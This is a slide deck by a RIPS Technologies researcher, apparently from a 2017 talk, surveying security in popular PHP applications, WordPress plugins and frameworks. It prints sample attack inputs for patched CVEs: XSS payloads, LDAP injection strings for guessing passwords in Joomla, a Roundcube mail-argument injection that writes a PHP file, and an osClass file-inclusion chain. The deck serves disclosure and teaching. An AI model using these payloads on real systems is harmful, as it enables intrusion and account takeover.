the security state of open-source php applications · · 2017-10-26osclass command execution via...

The Security State of Open Source PHP Applications

Dr. Johannes Dahse, RIPS Technologies GmbH

AboutIntroduction

Johannes Dahse

● Master IT Security at RUB, Germany (2006 - 2012)

● Capture The Flag (CTF) Contests

● Security Consultant

● Developer of RIPS open source security scanner (2009 - 2011)

● PhD in „Static Code Analysis“ at RUB (2013 - 2016)

● CEO & Co-Founder RIPS Technologies GmbH

Why care about PHP security?Introduction

$3.8Maverage data breach costs

#1 Choiceof cyber criminals

90%use open source libraries

22 Attacks/Dayon an average website

The Security State ofIntroduction

Top 5 PHP Applications


PHP Application Extensions

Top 6 PHP Frameworks

Top 5 PHP ApplicationsThe Security State of the


60%

7%

5%2%

1%

25%

CMS Market Share

WordPress

Joomla!

Drupal

Magento

Typo3

Other

Source: w3techs.com

Security FeaturesTop 5 PHP Applications

Application(latest version)

PreparedStatements

TemplateEngine

CSRF Protection

Password Hashing

Security Team

Auto Update*

Bug BountyProgram

WordPress vsprintf() none yes phpass yes yes yes

Joomla! MySQLi custom yes bcrypt yes no no

Drupal PDO Twig yes salted sha-512 yes no 2015

Magento PDO custom yes salted sha-256 yes no yes

Typo3 Doctrine Fluid yes pbkdf2 yes yes no

*Pro/Con Discussion: https://www.drupal.org/node/2367319

VulnerabilitiesTop 5 PHP Applications

0

5

10

15

20

25

30

35

40

45

2010 2011 2012 2013 2014 2015 2016 2017

Number of Vulnerabilities per Year

WordPress

Joomla!

Drupal

Magento

Typo3

Source: cvedetails.com

VulnerabilitiesTop 5 PHP Applications

0

1

2

3

4

5

6

7

8

2010 2011 2012 2013 2014 2015 2016 2017

Number of Critical Vulnerabilities per Year (CVSS Score > 7)

WordPress

Joomla!

Drupal

Magento

Typo3

Source: cvedetails.com

Vulnerability Example #1Top 5 PHP Applications

CVE-2015-3438 – Persistent XSS in Wordpress 4.1.2

https://cedricvb.be/post/wordpress-stored-xss-vulnerability-4-1-2/

● MySQL‘s utf8 charset only supports 3-byte characters

● Strings with 4-byte characters will be truncated when inserted into utf8 columns

● Solution: Use MySQL strict mode or latin1 charset

Insert: test𝌆123

Result: test





<div class="comment" id="comment-1">

<div class="comment-content">

<a title='test𝌆123'>click</a>

</div>

</div>







<a title='test

</div>

</div>



hack' onmouseover='alert(1)' style='width:100%;height:100%;…'

</div>

</div>



CVE-2017-14596 – LDAP Injection in Joomla! 1.5 - 3.7.5

https://blog.ripstech.com/2017/joomla-takeover-in-20-seconds-with-ldap-injection-cve-2017-14596/





class LoginController extends JControllerLegacy

{

public function login() {

⋮$app = JFactory::getApplication();

⋮$model = $this->getModel('login');

$credentials = $model->getState('credentials');

⋮$app->login($credentials, array('action' => 'core.login.admin'));

}





class JApplicationCms extends JApplicationWeb {

public function login($credentials, $options = array()) {

⋮$authenticate->authenticate($credentials, $options);

}

}

class JAuthentication extends Jobject {

public function authenticate($credentials, $options = array()) {

⋮$plugin->onUserAuthenticate($credentials, $options, $response);

}





class PlgAuthenticationLdap extends JPlugin

{

public function onUserAuthenticate($credentials, $options, &$response){

⋮$userdetails = $ldap->simple_search(

str_replace(

'[search]',

$credentials['username'],

$this->params->get('search_string') // uid=[search]

)

);

}


XXX;(&(uid=Admin)(userPassword=A*))

XXX;(&(uid=Admin)(userPassword=B*))

XXX;(&(uid=Admin)(userPassword=C*))

...

XXX;(&(uid=Admin)(userPassword=s*))

...

XXX;(&(uid=Admin)(userPassword=se*))

...

XXX;(&(uid=Admin)(userPassword=sec*))

...

XXX;(&(uid=Admin)(userPassword=secretPassword))





Vulnerability Demo #2Top 5 PHP Applications

ConclusionTop 5 PHP Applications

● Good security features by default

● Great security teams

● Bug bounty programs

● But very attractive targets

● Average 14 security issues reported per year

● Average 1-2 critical issues reported per year

● As secure/insecure as any other popular softwarehttps://codex.wordpress.org/Hardening_WordPresshttps://docs.joomla.org/Security_Checklist/enhttps://www.drupal.org/docs/8/securityhttps://magento.com/security/best-practiceshttps://docs.typo3.org/typo3cms/SecurityGuide/

https://codex.wordpress.org/Hardening_WordPress

https://docs.joomla.org/Security_Checklist/en

https://www.drupal.org/docs/8/security

https://magento.com/security/best-practices

https://docs.typo3.org/typo3cms/SecurityGuide/


● PHP Applications within the list of popular CMS (w3techs.com)

● E.g. PrestaShop, phpBB, SugarCRM

● Popular PHP Applications with a similar high google trend

● E.g. phpMyAdmin, Piwik, Roundcube

● 50 Applications, 13.2 MLOC total (300 KLOC average)

● Automated code analysis

Security StateTop 50 PHP Applications

56%

44%

Security Contact Available

Yes No

58%

42%

Critical Detected by RIPS

Yes No

39%

28%

33%

Time To Fix (if)

2 weeks 6 weeks 3 month

Attack VectorsTop 50 PHP Applications

SQL Injection

PHP Object Injection

Cross-Site Scripting

Command Execution

File Upload

Path Traversal

Code Execution

File Inclusion

Critical Examples

Software Attack Vector detected by RIPS

Roundcube Command Execution via Email

FreePBX Command Execution via Cross-Site Scripting

Coppermine Command Execution via SQL Injection

osClass Command Execution via Local File Inclusion

Expression Engine Command Execution via PHP Object Injection

KLIQQI CMS Command Execution via Cross-Site Request Forgery

Redaxo CMS Command Execution via Cross-Site Request Forgery

Precurio Command Execution via Path Traversal

Serendipity Command Execution via Logical Flaw


https://demo.ripstech.com


https://blog.ripstech.com/2016/roundcube-command-execution-via-email/

CVE-2016-9920 – Remote Command Execution in Roundcube 1.2.2





$from = rcube_utils::get_input_value('_from', rcube_utils::INPUT_POST);

$RCMAIL->deliver_message($MAIL, $from, $mailto, $error);

public function deliver_message(&$message, $from, $mailto, &$error) {

⋮if (filter_var(ini_get('safe_mode'), FILTER_VALIDATE_BOOLEAN))

$sent = mail($to, $subject, $msg_body, $header_str);

else

$sent = mail($to, $subject, $msg_body, $header_str, "-f$from");





[email protected] -OQueueDirectory=/tmp -X/var/www/html/rce.php

04731 <<< To: [email protected]

04731 <<< Subject: <?php phpinfo(); ?>

04731 <<< X-PHP-Originating-Script: 1000:rcube.php

04731 <<< MIME-Version: 1.0

04731 <<< Content-Type: text/plain; charset=US-ASCII;

04731 <<< Content-Transfer-Encoding: 7bit

04731 <<< Date: So, 20 Nov 2016 04:02:52 +0100

04731 <<< From: [email protected] -OQueueDirectory=/tmp

04731 <<< -X/var/www/html/rce.php

…


Vulnerability DisclosureTop 50 PHP Applications

Software Affected Version CVE Patch Date

Roundcube <= 1.2.2 CVE-2016-9920 2016-11-28

MediaWiki < 1.29 2016-12-10

Zend Framework < 2.4.11 CVE-2016-10034 2016-12-20

PHPMailer <= 5.2.18 CVE-2016-10033 2016-12-28

SwiftMailer <= 5.4.5-DEV CVE-2016-10074 2016-12-29

SquirrelMail <= 1.4.23 CVE-2017-7692

I was reading https://blog.ripstech.com/2016/roundcube-command-

execution-via-email/. We don't do escaping of the fifth argument to

mail() either.https://phabricator.wikimedia.org/T152717

https://blog.ripstech.com/2016/roundcube-command-


switch ($this->action) {

case 'error_plugin':

…

include( osc_plugins_path() . Params::getParam('plugin') );

Plugins::install(Params::getParam('plugin'));

Local File Inclusion in osClass 1.2.2

https://blog.ripstech.com/2016/osclass-remote-code-execution-via-image-file/





…



$original = pathinfo($uploader->getOriginalName());

…

$filename = uniqid("qqfile") . "." . $original['extension'];

$result = $uploader->handleUpload('uploads/temp/' . $filename);

$img = ImageResizer::fromFile('uploads/temp/' . $filename)->autoRotate();





shell.jpg


shell.jpg

include('plugins/../uploads/temp/shell.jpg');




…






Security IndicatorsTop 50 PHP Applications

40%

24%

16%

16%

Template Engine

None Smarty

Custom Twig

Other

15%

20%

Password Hash

bcrypt pbkdf2

php-crypt phpass

salted hash md5/sha

86%

14%

CSRF Protection

Yes No

59%

41%

Prepared Statements

Yes No

65%

ConclusionTop 50 PHP Applications

● Many security issues, although reviewed by the community

● 58% fail the OWASP Top 10

● 66% fail security best practices

● Use at own risk

● Less popular PHP applications than the Top 50 are considered worse

● RIPS Advent of PHP Application Vulnerabilities (APAV)

https://blog.ripstech.com/2016/apav-advent-of-php-application-vulnerabilities/

https://blog.ripstech.com/2016/apav-advent-of-php-application-vulnerabilities/

PHP Application ExtensionsThe Security State of

PHP Application ExtensionsThe Security State of

0

5000

10000

15000

20000

25000

30000

35000

40000

45000

50000

Number of Extensions

WordPress Joomla! Drupal Magento Typo3

Analysis ApproachWordPress Plugins

● Downloaded 41K plugins from the WordPress plugin directory with active installs

● More plugins exist but were not included into analysis (e.g. commercial)

● Analysis with RIPS

● magic_quotes_gpc enabled

● WordPress-specific configuration enabled

● No need for WordPress core analysis

https://api.wordpress.org/plugins/info/1.1/?action=query_plugins

https://api.wordpress.org/plugins/info/1.1/?action=query_plugins

By Size and DetectionWordPress Plugins

0

50

100

150 LOC of Top 250 plugins

1-100 101-500 501-1K 1K-5K >5K0

5000

10000

15000

20000 LOC of 41K plugins

1-100 101-500 501-1K 1K-5K >5K


0

50

100


1-100 101-500 501-1K 1K-5K >5K0

5000

10000

15000


1-100 101-500 501-1K 1K-5K >5K

47%

53%

Vulnerabilitydetected

Nothingdetected

32%

68%


Nothingdetected


0

50

100


1-100 101-500 501-1K 1K-5K >5K0

5000

10000

15000


1-100 101-500 501-1K 1K-5K >5K

45%

55%


Nothingdetected

53%

47%Vulnerabilitydetected

Nothingdetected

By Vulnerability TypeWordPress Plugins

52%

10%

3%

2%2%

1%

1%

29%

All 41K Plugins Cross-Site Scripting

SQL Injection

Resource Injection

File Create

Path Traversal

File Delete

PHP Object Injection

Other

ConclusionWordPress Plugins

● Assumption from statistics:

● Every second WP plugin has a security issue

● 18% of all WP plugins are prone to XSS

● 5% of all WP plugins are prone to SQLi

● Use actively maintained and popular plugins

● Keep your plugins up to date

PHP FrameworksThe Security State of

Popular PHP FrameworksThe Security State of

● Laravel

● Symfony

● CodeIgniter

● CakePHP

● Yii

● Zend Framework

Source: trends.google.com

Security FeaturesPopular PHP Frameworks

Framework AnalyzedVersion

Template Engine

Database Abstraction

CSRF Protection

Password Hash

Security Contact

Laravel 5.5.0 Blade Eloquent ORM yes bcrypt yes

Symfony 3.3.10 PHP, Twig, … Doctrine ORM yes bcrypt yes

CodeIgniter 3.1.6 custom Query Builder yes bcrypt yes

CakePHP 3.5.3 PHP Cake ORM yes bcrypt no

Yii 2.0.12 PHP Query Builder Yes bcrypt yes

Zend Framework 3.0.1 PHP Query Builder Yes bcrypt yes

Security VulnerabilitiesPopular PHP Frameworks

0

1

2

3

4

5

6

7

2010 2011 2012 2013 2014 2015 2016 2017

Number of Vulnerabilities per YearLaravel

Symfony

CodeIgniter

CakePHP

Yii

Zend

Pitfall Example #1Popular PHP Frameworks

Doctrine Query Builder

$qb = $em->createQueryBuilder();

$qb->select('u')->from('User', 'u')->where("u.id = $id");





/** @var \Doctrine\DBAL\Connection $con */

$connection = $doctrine->getConnection();

$connection->update('users', array('name'=>$_GET['name']), array('id'=>1));





/** @var \Doctrine\DBAL\Connection $con */


$connection->update('users', array('name'=>$_GET['name']), array('id'=>1));


$connection->update('users', array($_GET['name']=>'rips'), array('id'=>1));

$connection->update('users', $_POST, array('id'=>1));


Html::secureLink($_GET['url']);

https://laravel.com/api/5.5/Illuminate/Html/HtmlBuilder.html



Html::secureLink($_GET['url']);


class HtmlBuilder

{

public function secureLink($url, $title=null) {

return $this->link($url, $title, true);

}

public function link($url, $title=null, $secure=null) {

$url = $this->url->to($url, array(), $secure);

return '<a href="'.$url.'">'.$this->entities($title).'</a>‘;

}

}



Html::secureLink( mailto:"><script>alert(1)</script> );

https://laravel.com/api/5.5/Illuminate/Html/HtmlBuilder.html<a href="mailto:"><script>alert(1)</script>

class HtmlBuilder

{

public function secureLink($url, $title=null) {

return $this->link($url, $title, true);

}

public function link($url, $title=null, $secure=null) {

$url = $this->url->to($url, array(), $secure);

return '<a href="'.$url.'">'.$this->entities($title).'</a>‘;

}

}


ConclusionPopular PHP Frameworks

● Separation of concerns

● Enforce security best practices

● Help to build secure applications from the ground up

● Use them

● But be careful how you use them

SummaryThe Security State

SummaryThe Security State

Plugins & ExtensionsPHP applicationsPHP frameworks

PHP Application SecurityWhat can I do for my

● The more third-party code you deploy, the greater the attack surface

● Remove unnecessary libraries

● Avoid/Protect unpopular open source applications

● Keep all dependencies up-to-date (composer)

● Train developers for security best practices

● Join our Advent Calendar 2017: blog.ripstech.com

● Integrate automated code analysis into your SDLC

Questions?

Thank you for your attention

[email protected]

the security state of open-source php applications · · 2017-10-26osclass command execution via...

Documents